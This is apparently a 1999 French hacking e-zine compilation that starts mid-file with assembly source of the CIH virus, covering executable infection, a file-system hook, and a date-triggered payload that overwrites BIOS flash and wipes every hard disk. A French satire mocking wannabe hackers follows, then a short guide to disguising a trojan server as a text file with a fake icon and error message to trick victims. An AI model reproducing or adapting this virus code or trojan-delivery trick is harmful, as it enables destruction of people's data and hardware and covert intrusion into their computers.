(MyVirusStart-@9)[esi] push edi ; Address of Buffer ; *************************** ; * Let's Modify the * ; * AddressOfEntryPoint to * ; * My Virus Entry Point * ; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ; *************************** ; * Setup Initial Data * ; *************************** lea edx, [esi-SizeOfScetionTable] mov ebp, offset VirusSize jmp StartToWriteCodeToSections ; *************************** ; * Write Code to Sections * ; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable mov ebx, (SizeOfRawData-@9)[edx] sub ebx, (VirtualSize-@9)[edx] jbe EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx mov ebx, (PointerToRawData-@9)[edx] add ebx, (VirtualSize-@9)[edx] push ebx ; Pointer of File push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] mov [eax+4], ebx mov ebx, [eax] add (VirtualSize-@9)[edx], ebx ; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h StartToWriteCodeToSections: sub ebp, ebx jbe SetVirusCodeSectionTableEndMark add edi, ebx ; Move Address of Buffer EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; *************************** ; * Only Set Infected Mark * ; *************************** OnlySetInfectedMark: mov esp, dr1 jmp WriteVirusCodeToFile ; *************************** ; * Set Virus Code * ; * Section Table End Mark * ; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ; *************************** ; * When VirusGame Calls * ; * VxDCall, VMM Modifies * ; * the 'int 20h' and the * ; * 'Service Identifier' * ; * to 'Call [XXXXXXXX]'. * ; *************************** ; * Before Writing My Virus * ; * to File, I Must Restore * ; * them First. ^__^ * ; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] mov cl, VxDCallTableSize LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] mov [eax+2], edx movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] sub eax, edx loop LoopOfRestoreVxDCallID ; *************************** ; * Let's Write * ; * Virus Code to the File * ; *************************** WriteVirusCodeToFile: mov eax, dr1 mov ebx, [eax+10h] mov edi, [eax] LoopOfWriteVirusCodeToFile: pop ecx jecxz SetFileModificationMark mov esi, ecx mov eax, 0d601h pop edx pop ecx call edi ; VXDCall IFSMgr_Ring0_FileIO jmp LoopOfWriteVirusCodeToFile ; *************************** ; * Let's Set CF = 1 ==> * ; * Need to Restore File * ; * Modification Time * ; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) pushf ; ************************************* ; * Close File * ; ************************************* CloseFile: xor eax, eax mov ah, 0d7h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Need to Restore File Modification * ; * Time !? * ; ************************************* popf pop esi jnc IsKillComputer ; ************************************* ; * Restore File Modification Time * ; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Disable OnBusy * ; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy ; ************************************* ; * Call Previous FileSystemApiHook * ; ************************************* prevhook: popad mov eax, dr0 ; jmp [eax] ; Jump to prevhook ; ************************************* ; * Call the Function that the IFS * ; * Manager Would Normally Call to * ; * Implement this Particular I/O * ; * Request. * ; ************************************* pIFSFunc: mov ebx, esp push dword ptr [ebx+20h+04h+14h] ; Push pioreq call [ebx+20h+04h] ; Call pIFSFunc pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ; *************************** ; * After Calling pIFSFunc, * ; * Get Some Data from the * ; * Returned pioreq. * ; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h jne QuitMyVirusFileSystemHook ; ***************** ; * Get the File * ; * Modification * ; * Date and Time * ; * in DOS Format.* ; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ; *************************** ; * Quit My Virus' * ; * IFSMgr_FileSystemHook * ; *************************** QuitMyVirusFileSystemHook: popad ret ; ************************************* ; * Kill Computer !? ... *^_^* * ; ************************************* IsKillComputer: ; Get Now Month from BIOS CMOS mov ax, 0708h out 70h, al in al, 71h xchg ah, al ; Get Now Day from BIOS CMOS out 70h, al in al, 71h xor ax, 0426h ; 04/26/???? jne DisableOnBusy ; ************************************** ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; ************************************** ; *************************** ; * Kill BIOS EEPROM * ; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; *********************** ; * Show BIOS Page in * ; * 000E0000 - 000EFFFF * ; * ( 64 KB ) * ; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; *********************** ; * Show BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** mov di, 0058h dec edx ; and al,0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; *********************** ; * Show the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E01FF * ; * ( 512 Bytes ) * ; * , and the Section * ; * of Extra BIOS can * ; * be Writted... * ; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; *********************** ; * Kill the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E007F * ; * ( 80h Bytes ) * ; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; *********************** ; * Show and Enable the * ; * BIOS Main ROM Data * ; * 000E0000 - 000FFFFF * ; * ( 128 KB ) * ; * can be Writted... * ; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; *********************** ; * Kill the BIOS Main * ; * ROM Data in Memory * ; * 000FE000 - 000FE07F * ; * ( 80h Bytes ) * ; *********************** mov ah, 0e0h mov [eax], al ; *********************** ; * Hide BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** ; or al,10h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; *************************** ; * Kill All HardDisk * ; *************************************************** ; * IOR Structure of IOS_SendCommand Needs * ; *************************************************** ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * ; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; *************************** ; * Enable EEPROM to Write * ; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; *************************** ; * IO for EEPROM * ; *************************** IOForEEPROM: @10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; ********************************************************* ; * Static Data * ; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h VxDCallTableSize = ($-VxDCallIDTable)/04h ; ********************************************************* ; * Virus Version Copyright * ; ********************************************************* VirusVersionCopyright db 'CIH v' db MajorVirusVersion+'0' db '.' db MinorVirusVersion+'0' db ' TTIT' ; ********************************************************* ; * Virus Size * ; ********************************************************* VirusSize = $ ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ; ********************************************************* ; * Dynamic Data * ; ********************************************************* VirusGameDataStartAddress = VirusSize @6 = VirusGameDataStartAddress OnBusy db 0 FileModificationTime dd ? FileNameBuffer db FileNameBufferSize dup(?) @7 = FileNameBuffer DataBuffer = $ @8 = DataBuffer NumberOfSections dw ? TimeDateStamp dd ? SymbolsPointer dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? _Characteristics dw ? Magic dw ? LinkerVersion dw ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUninitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ImageBase dd ? @9 = $ SectionAlignment dd ? FileAlignment dd ? OperatingSystemVersion dd ? ImageVersion dd ? SubsystemVersion dd ? Reserved dd ? SizeOfImage dd ? SizeOfHeaders dd ? SizeOfImageHeaderToRead = $-NumberOfSections NewAddressOfEntryPoint = DataBuffer ; DWORD SizeOfImageHeaderToWrite = 04h StartOfSectionTable = @9 SectionName = StartOfSectionTable ; QWORD VirtualSize = StartOfSectionTable+08h ; DWORD VirtualAddress = StartOfSectionTable+0ch ; DWORD SizeOfRawData = StartOfSectionTable+10h ; DWORD PointerToRawData = StartOfSectionTable+14h ; DWORD PointerToRelocations = StartOfSectionTable+18h ; DWORD PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD NumberOfRelocations = StartOfSectionTable+20h ; WORD NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD Characteristics = StartOfSectionTable+24h ; DWORD SizeOfScetionTable = Characteristics+04h-SectionName ; ********************************************************* ; * Virus Total Need Memory * ; ********************************************************* VirusNeedBaseMemory = $ VirusTotalNeedMemory = @9 ; + NumberOfSections(??)*SizeOfScetionTable(28h) ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ; ********************************************************* ; ********************************************************* VirusGame ENDS END FileHeader [**@\/\/\/@**]Copied by Asmodeus[**@\/\/\/@**]7/09/99[**@\/\/\/@**] 2.0 Toi aussi tu peut etre Mi te nique ----------------------------------- [**@\/\/\/@**] (auteur : Chu underground!) Je suis un hacker, donc j'installe Linux Bon, si tu veux etre un vrai trou du cul de hacker, il va te falloir Linux. La, tu as 2 solutions : ou Tu es un sale bourgeois capitaliste et tu l'achetes 150 balles a la Fnac ou Tu es un vrai trou du cul, et la tu le download par le Net Evidemment, tu es un vrai trou du cul donc tu ouvres ton tit client FTP et tu te tapes tranquillement les 20 ou 25 heures de download pour une Slack ou une Debian. Evite la Red Hat, ca fait trop grand public, toi t'es une mec uNdERgrOuNd maintenant, c'est normal, t'es hacker. Bon, tu as ton Linux, maintenant c'est bon oublie le. Pas le peine de se casser le cul a apprendre un nouvel OS dont tu ne te servira jamais parce que XWing vs Tie Fighter tourne pas dessus. La meilleur solution consiste carrement a niquer lilo, comme ca tu es sur que tu ne booteras que sous Windows95.C'est un solution ‚l‚gante que de nombreux trous du cul semblent avoir choisi. Pour ca, ouvres un session DOS par Windows et tape fdisk /mbr. Ca va effacer lilo qui etait install‚ sur le MBR de ton disque dur, comme ca tu n'auras plus a te soucier de Linux. L'essentiel est de l'avoir,pas de savoir s'en servir. "Ouais mais comment je peux prouver au gens que j'ai Linux et passer pour un gros rebel ?" C'est une question bien naturelle. J'ai pens‚ a toi petit looser et voici une serie de phrase qu'il faut balancer a propos de Linux, aussi bien sur IRC que dans la vrai vie : - "Linux c'est trop puissant, t'es completement libre par rapport a ces OS de fachos genre Windaube. De toute facon, MS c'est trop ripou." - "Bah si t'es un debutant, va pas sous Linux, c'est fait pour les eLiTeS cet truc, toi reste sous winfuck." - "Dis, tu sais pas ou je pourrais trouver la libc5.4.36 ? Parce que chez moi la 5.4.35 est incompatible avec les modifs que j'ai fait au kernel." - "Ca pue netscape, moi ca me dumpe des core de 10megas des que le lance, je prefere Lynx au moins c'est pas prise de gueule c'est mieux le mode texte." - "Ralala le bouffon que c'est lui ! Il s'est install‚ un Red Hat !! Tain c'est de la daube les Red Hat c'est nul y'a que la Debian qui est bien, au moins tu sais ce que tu fais t'es le master de ton system nan vraiment c'est ripou Red Hat." Avec ce genre de petites phrases, tu te retrouveras tres vite class‚ dans la categorie "OK c'est un trou du cul, mais un trou du cul sous Linux", ce qui est la premiere ‚tape pour etre un vrai hacker. Maintenant que tout le monde sait que tu as ton Linux, il faut passer au stade suivant, celui du pro des reseaux, genre le mec qui maitrise ICMP a mort. C'est la deuxieme ‚tape de ton long periple. Je ne suis qu'un assoiff‚ de connaissance Ici, il faut mettre la main au porte-monnaie. Direction la FNAC, tu achetes$ n'importe quel bouquins sur Unix et sur les reseaux. L'essentiel est que le titre soit compliqu‚. Un petit "Protocole rlogin sur reseau Ethernet en sous-adressage" sera du meilleur effet.N'hesite pas, des que tu ne comprends meme pas le titre, il faut acheter le bouquin, c'est pas pour lire,c'est pour impressionner des autres potes trous du cul. Une bonne methode consiste a acheter un bouquin genre "TCP/IP volume 43" et de prendre des mots au hasard a apprendre par coeur : raw socket, sur-adressage, FDDI, telnet par exemple. Ensuite, tu les resors dans une phrase, meme hors contexte c'est pas grave personne n'ira verifier ce que ca veut dire. Par exemple il ne faut pas hesiter a balancer un "Le Telnet, ca prends combien de raw sockets en sur-adressage sur un FDDI" sur un bon gros channel de cowboyz, ca impresionne toujours, et personne n'ira te dire que ca n'a aucun sens ne t'inquiete pas. Dispose ensuite ces bouquins dans ta chambre, avec les titres les plus compliqu‚s aux endroit les plus visibles.Corne quelques pages pour faire plus vrai. Prends aussi quelques feuilles et dessine des schema bidon de reseau, ou met des trucs genre 123.44.5.34 root/lydia pour faire croire que tu te choppes de password comme un ouf. Faut se la jouer a mort, ne jamais hesiter a en rajouter, scanne toi une photo de mitnick et accroche la au dessus de ton lit,ou met des autocollants a tete de mort sur ton WC pour bien dire que maintenant, t'es un voyou, un mec dangereux. Pour completer le tout et vraiment passer pour un hacker, il ne faut pas hesiter a dire des conneries du genre "Je ne suis qu'un assoifée de connaissance". OK, tu quadruple ta seconde, mais bon c'est pas grave, tu aimes quand meme apprendre, c'est ta grande passion et tu as beaucoup de volont‚. Precise bien que jamais tu ne causes de degats aux tres nombreuses machines que tu penetres, dis que tu fais juste ca "pour le challenge intellectuel".Oui, la, il faudra te forcer pour ne pas exploser de rire, mais entraine toi devant ta glace avant. La communaut‚ des hackers a 1 franc Quand on est un mec dangereux comme toi, on doit se r‚unir avec d'autres bandits pour mettre en peril la sureté de l'Etat.Pour ca il existe LE rendez vous de toute la racaille, c'est le Meet 2600. Tous les mois, tu iras dans un MacDo de Paris,Place d'Italie, et la tu rencontrera des grands monsieurs, des mecs qui ont reboot‚ tout Internet avec un prog en Visual Basic et qui ont des coupes de cheveux de rebels de la soci‚t‚. Bon, tu n'y apprendras pas grand chose, les loosers qui viennent la bas se branlent entre eux en se disant "Ouais, on est des hAcKeRz,on est sans piti‚, on est des vrais durs, oh zut il est deja 18 heures faut que je rentre ma mere va me cogner sinon".Tu pourras quand meme avoir un vrai frisson en t'imaginant que le MacDo et truff‚ de cameras et de micro, et que tous les employ‚s sont des agents de la DST qui ecoutent des conversation aussi dangereuses que : Trouduku1 : il est a combien le Whooper ? Trouduku2 : euh MacDo fait des Whoopers maintenant ? Trouduku1 : bah ouais ils en ont toujours fait nan ? La communauté des hAcKeRz aime bien aussi les raves. Ca fait partie du trip "rebel no future fuck da society, on gobe des extas on ecoute de la musique de daube mais on s'en fout c'est super parce que c'est interdit ". N'hesite pas a te rendre la bas, ca fait incontestablement partie de la culture du paum‚ que d'aller jouer les chauds dans ces soir‚es. Putain je suis dans les greets de Hack-Hebdo !! trop foooort !! Toi, t'es un vrai trou du cul qui hacke, et tu entends bien repandre ton savoir pour former d'autres minables comme toi. Pour ca, il existe les e-zine. On peut citer les plus connus comme NoWay ou NoRoute ou le pire cotoye le meilleur (et c'est dommage pour le meilleur...) mais aussi des vrais merdes qui meriteraient d'etre plus connues, comme l'excellent Core-Dump qui est une veritable farandole de guignolos expliquant des truc archi connu dans un francais que mon chat comprends mieux que moi. Evidemment, tu n'as pas lu les bouquins sur Unix, tu n'as jamais hack‚ la moindre machine de ta vie donc tu ne sais pas quoi ecrire. Rassure toi, tu n'es pas le seul dans ce cas. La meilleure methode est de pondre un article sur le rap, a raconter sa derniere rave ou a pomper Phrack sans rien comprendre. La encore, si tu pompes Phrack, n'hesite pas a carrement corriger le mec ou a rajouter des trucs pour faire plus compliqu‚, personne n'ira verifier,donc vas y lache toi t'es un assoiff‚ de connaissance, oublie pas. OUAIS ! Je suis un hacker, un delinquant du telnet Maintenant, c'est clair, tu es un vrai hacker, une racaille de l'IRC, un loubard d'Internet, tu fais peur a toutes les agences gouvernementales et IBM veut t'embaucher pour securiser leur reseau parce que cette pedale d'Henri leur a encore coll‚ un virus d'Internet. Il va donc falloir, au quotidien, se comporter comme un hacker, un vrai,un dur, c'est a dire avec un esprit hacker et un langage de hacker.Un hacker, ca vit avant tout sur IRC. Une fois que tes amis et ta famille auront bien vu que tu as chang‚,que tu n'es plus le meme homme, il va falloir repandre aussi la nouvelle sur IRC et te faire des nouveaux amis qui seront comme toi des trous du cul. Fini les #coquelicots ou les #amiti‚_fr,maintenant tu devras aller dans les bas fond de l'IRC, le cyber-Bronx, nuke-city, la ou seuls les vrais cogneurs reussissent a se faire un place dans cette univers de violence. Pour ca, tu va devoir passer du stade hacker trou du cul a celui de trou du cul sur IRC qui se la pete mitnick, a savoir le c0wb0y. [**@\/\/\/@**]Copied by Asmodeus[**@\/\/\/@**]16/09/99[**@\/\/\/@**] 2.1 Comment refiler une taupe a un gros con ? --------------------------------------------- [**@\/\/\/@**] Bon alors ici on va voir comment il faut faire pour refiler une taupe(le serveur d'un troyen)a un gros con (ou a une grosse conne).Premierement il faut renommer le prog en Poeme.exe ou autre connerie du genre.A vous de voir. Ensuite il faut un editeur d'icones(Ax-icons,Microangelo,Icon Forge,etc...) Vous capturez l'icone d'un fichier texte ou tout autre fichier associe au bloc-notes.Vous foutez cette icone la sur la taupe et si le gros con (ou la grosse conne)n'a pas choisi l'option "afficher les extensions MS-Dos" Il (ou elle) lancera le programme en croyant que c'est un fichier texte. Cool non ?On peut aussi faire ca avec des icones de fichiers .doc ou .xls. Evidemment si avec votre taupe y'a un msg d'erreur qui apparait,ca fait un peu louche...Alors si c'est la taupe de Netbus par exemple,je pense qu'il y a un msg en rapport avec une DLL...Editez le prog changez le msg en "ERREUR : Fichier non compatible avec cette version du bloc-notes(ou de Word c encore mieux...)"Et apres que le gros con(ou la grosse conne;=))l'ai lance,vous lui dites ah oui il faut la derniere version du Note pad de Kro$oft... ET VOILA [**@\/\/\/@**]by Asmodeus the StOrMRider[**@\/\/\/@**]22/09/99[**@\/\/\/@**]